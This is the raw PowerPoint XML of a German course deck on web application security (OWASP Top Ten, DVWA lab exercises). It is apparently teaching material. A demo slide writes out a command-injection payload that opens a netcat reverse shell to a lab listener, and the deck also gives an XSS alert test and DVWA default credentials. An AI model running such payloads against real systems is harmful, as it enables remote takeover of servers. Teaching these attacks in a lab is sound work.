        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3158025" y="3882381"/>
            <a:ext cx="995362" cy="369332"/>
            <a:chOff x="317941" y="6215781"/>
            <a:chExt cx="995362" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Grafik 35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8BAF5E54-27E9-4533-963C-D6123A8FA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D061DFED-8E5B-4801-9B5F-63136AF47E9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7269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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lerninhalt</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3500" b="1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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Lernziele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03E245FA-AC17-42D2-A5A9-918C8592A983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1753885" y="1919445"/>
            <a:ext cx="9464179" cy="369332"/>
            <a:chOff x="1889621" y="3565761"/>
            <a:chExt cx="9464179" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr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AB1B2055-9C3B-4077-8F8D-09765844FFAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2345056" y="3565761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CH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kannst selbst einfachste Tests zur Sicherheit von Webapplikationen durchführen</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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50C144EF-5433-4D1F-AD53-BFEEB62C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89621" y="3665244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2180C67E-6C0C-4224-AAC3-3790B8979DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1753885" y="2633994"/>
            <a:ext cx="9464179" cy="369332"/>
            <a:chOff x="1753885" y="4057974"/>
            <a:chExt cx="9464179" cy="369332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12341FE7-DEF2-45D2-89AF-8B1174B1E0AD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CH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kennst die wichtigsten Angriffsarten auf Webapplikationen</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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7676911A-B707-409B-9B65-7D4AF24CE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24B2326-08D2-4C31-A362-7629D46D5228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1753885" y="3362843"/>
            <a:ext cx="9464179" cy="369332"/>
            <a:chOff x="1753885" y="4057974"/>
            <a:chExt cx="9464179" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr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AB8C5A14-BD46-45B5-A59D-A1A73072E10D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CH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weisst, wie man mit einfachen Mittel im Browser einfache Tests machen kann</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Grafik 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F6F103-A2CD-46A3-A20B-C3E7632F9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36" name="Gruppieren 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC6C728-1A2B-4277-B1C0-7F36BD031E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1753885" y="4244491"/>
            <a:ext cx="9464179" cy="369332"/>
            <a:chOff x="1753885" y="4057974"/>
            <a:chExt cx="9464179" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr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B8DCDAE6-5998-4C16-A04C-B473D829FC06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CH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weisst, wie man die Sicherheit von Webapplikationen beurteilen kann</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="Grafik 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0F4EB9-4183-4044-921F-6E2E3D877B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286906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DVWA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6" y="2955396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OWASP Top Ten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88DA146E-88D6-4881-AF6A-C09125F53767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635170" y="1585529"/>
            <a:ext cx="1019223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DVWA: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Damn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Vulnerable Web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Application</a:t>
            </a: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hlinkClick r:id="rId4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https://github.com/digininja/DVWA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VM: In das Verzeichnis Block10/DVWA gehen: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docker-compose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–d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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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750 configure.sh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./configure.sh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Zugriff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 der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VM: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5"/>
              </a:rPr>
              <a:t>http://localhost:7070/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Username: admin, Password: password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Optional: Vom Host aus: Mit Host-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Only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Netzwerk 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6"/>
              </a:rPr>
              <a:t>http://cybercops-ip:7070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(mit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ifconfig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-a IP-Adresse herausfinden)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12FE85B-6CBD-49FB-BFBF-0A3CF804AFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="33064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7"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A03_2021-Injection/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4112444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CH" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A03:2021-Injection [1]</a:t>
            </a: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6" y="2955396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OWASP Top Ten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88DA146E-88D6-4881-AF6A-C09125F53767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635169" y="1585529"/>
            <a:ext cx="9797941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Aufgabe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DVWA: File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Inclusion</a:t>
            </a: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Wieder die Web Developer Toolbar benützen oder den Link in einem eigenen Browser Tab öffnen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Links auf der DVWA Seite beachten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Frage, welche zu klären ist: Wie können andere Dateien mit Hilfe eines relativen Pfades geladen werden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de-CH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Aufgabe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DVWA: Command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Injection</a:t>
            </a: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Frage, welche zu klären ist: Wie können in Linux Shell (bash) 2 Befehle hintereinander gehängt werden, so dass beide ausgeführt werden?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de-CH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10 Minuten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12FE85B-6CBD-49FB-BFBF-0A3CF804AFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="33064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4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A03_2021-Injection/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089179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CH" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A03:2021-Injection [1] (Übung RCE)</a:t>
            </a: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6" y="2955396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OWASP Top Ten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88DA146E-88D6-4881-AF6A-C09125F53767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635169" y="1585529"/>
            <a:ext cx="986014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Remote Code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Execution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(RCE)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“Königsdisziplin”, weil eigener Code auf dem Server ausgeführt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warden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kann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Repo mit vielen verschiedenen Reverse Shells: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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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Mit Hilfe von Command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Injection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kann eine Reverse Shell gestartet werden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12FE85B-6CBD-49FB-BFBF-0A3CF804AFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="33064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5"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A03_2021-Injection/</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12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B7CDF7F8-A8BB-4D63-9DD4-2CE40698B45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44" r="12585"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7954500" y="3401410"/>
            <a:ext cx="3767159" cy="27530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53DB63-1E1D-4A0D-9EF8-3DD5AA0249B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635169" y="3673599"/>
            <a:ext cx="5975989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Demo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Situation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Der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dvwa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Container / Webapplikation ist “innen” (nur mit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docker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Management Befehlen und Web von “aussen” erreichbar)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Die Shell in der Hacking Lab VM stellt “aussen” dar (kein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ssh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auf DVWA Container möglich)</a:t>
            </a:r>
          </a:p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627849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CH" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A03:2021-Injection [1] (Übung RCE)</a:t>
            </a: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6" y="2955396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OWASP Top Ten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88DA146E-88D6-4881-AF6A-C09125F53767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635169" y="1585529"/>
            <a:ext cx="986014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Vorbereitung Seite Hacker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HackingLab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 Shell einen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Listener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öffnen mit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ncat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lvp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4711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Damit hört dieser Prozess jetzt auf einkommende Verbindungen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Angriff (Web-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Applikation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In DVWA: Command Injection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wird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jetzt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per Injection die Reverse Shell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gestartet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Passende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Reverse Shell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suchen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in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PayLoadsAllTheThings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Hier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z.B.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172.16.1.1;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netcat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172.17.0.1 4711 -e /bin/bash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BÄNG!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Was würde ein Angreifer jetzt tun?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12FE85B-6CBD-49FB-BFBF-0A3CF804AFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="33064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4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A03_2021-Injection/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425106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CH" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A03:2021-Injection [1] (Übung XSS)</a:t>
            </a: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6" y="2955396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OWASP Top Ten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88DA146E-88D6-4881-AF6A-C09125F53767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635169" y="1585529"/>
            <a:ext cx="986014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XSS (Cross-Site Scripting)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Einfügen von (bösartigem) JavaScript, welcher dann im Browser (client-seitig) ausgeführt wird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Wird typischerweise in Links (Email oder Webseiten verpackt)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Testen mit: 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script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&gt;alert("XSS");&lt;/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script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de-CH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Aufgabe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DVWA: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XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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Optional: XSS (DOM)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CH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Optional: XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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Wie kann man das verhindern?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12FE85B-6CBD-49FB-BFBF-0A3CF804AFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="33064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4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A03_2021-Injection/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632190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A04:2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Design [1]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OWASP Top Ten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0" y="1585529"/>
            <a:ext cx="104880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Neues Thema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Weitet Thema Sicherheit von Web-Applikationen in Richtung Entwicklung aus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“Shift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Left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” im agilen Vorgehen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Massnahmen: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Threat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modeling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Secure Development Lifecycle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Entwickler in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Websecurity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/ Hacking Kurse schicken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Entsprechende Tests (Unit-Tests) schreiben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BD6676C-197F-4E99-8E61-EA4F50203B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="37869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4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A04_2021-Insecure_Design/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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0277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1B7C4167-B467-4B53-8756-ADE920662AEA}" vid="{F2889E94-8289-4930-9608-BDE2EC83CD1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CE31B3248DBCC44BC6C7EB355FC59B1" ma:contentTypeVersion="13" ma:contentTypeDescription="Ein neues Dokument erstellen." ma:contentTypeScope="" ma:versionID="b6ac7c184955d30223ed822961971ea8">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="4b828ac8-0d1f-49fc-88d2-9381040e6d15" xmlns:ns3="20a6b1da-8333-4eed-aa9d-b411e1d87939" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="d0e4cc44773019f6c616094f2954245c" ns2:_="" ns3:_="">
    <xsd:import namespace="4b828ac8-0d1f-49fc-88d2-9381040e6d15"/>
    <xsd:import namespace="20a6b1da-8333-4eed-aa9d-b411e1d8793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828ac8-0d1f-49fc-88d2-9381040e6d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a6b1da-8333-4eed-aa9d-b411e1d87939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A06114E-5342-4E32-BFED-FE75528B6EA4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de36c714-6c13-4f14-b1bf-3ae7f4de6f7c"/>
    <ds:schemaRef ds:uri="acdeab17-90d6-4afc-85a1-e9e0a724df5a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9905352-1AE8-4642-AC31-805003B3A7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b828ac8-0d1f-49fc-88d2-9381040e6d15"/>
    <ds:schemaRef ds:uri="20a6b1da-8333-4eed-aa9d-b411e1d8793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C2287D1-F495-476B-8FB3-69BD6792CD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PP Lernvideo_20180427</Template>
  <TotalTime>0</TotalTime>
  <Words>1320</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>233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Lato Light</vt:lpstr>
      <vt:lpstr>Webdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>Fachkürzel - Fach ausgeschrieben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Engineering</dc:title>
  <dc:creator>dorotea.boehm@lernen.siw.swiss</dc:creator>
  <cp:lastModifiedBy>Dominik Kuhn</cp:lastModifiedBy>
  <cp:revision>87</cp:revision>
  <cp:lastPrinted>2020-06-05T15:25:10Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-30T12:10:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-07T20:52:47Z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0x0101003CE31B3248DBCC44BC6C7EB355FC59B1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="AuthorIds_UIVersion_1024">
    <vt:lpwstr>6</vt:lpwstr>
  </property>
</Properties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>